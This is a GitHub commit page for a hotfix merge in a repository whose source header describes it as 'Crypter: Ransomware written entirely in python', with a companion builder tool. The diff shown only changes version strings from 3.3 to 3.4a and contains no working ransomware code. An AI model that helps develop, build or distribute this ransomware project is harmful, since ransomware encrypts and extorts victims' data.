Skip to content

Commit

Permalink
Merge branch 'hotfix/3.4a'
Browse files Browse the repository at this point in the history
  • Loading branch information
CSec0ps committed Aug 27, 2020
2 parents 181c768 + 23117c9 commit fb2b6ee
Show file tree
Hide file tree
Showing 3 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion Crypter/Crypter/Crypter.py
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
'''
@summary: Crypter: Ransomware written entirely in python.
@author: Sithis
@version: 3.3
@version: 3.4a
'''

import json
Expand Down
2 changes: 1 addition & 1 deletion CrypterBuilder/Base.py
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@

## VERSION
MAJ_VERSION = "3"
MIN_VERSION = "3"
MIN_VERSION = "4a"

# TITLE
TITLE = "Crypter Builder v%s.%s" % (MAJ_VERSION, MIN_VERSION)
Expand Down
File renamed without changes.

0 comments on commit fb2b6ee

Please sign in to comment.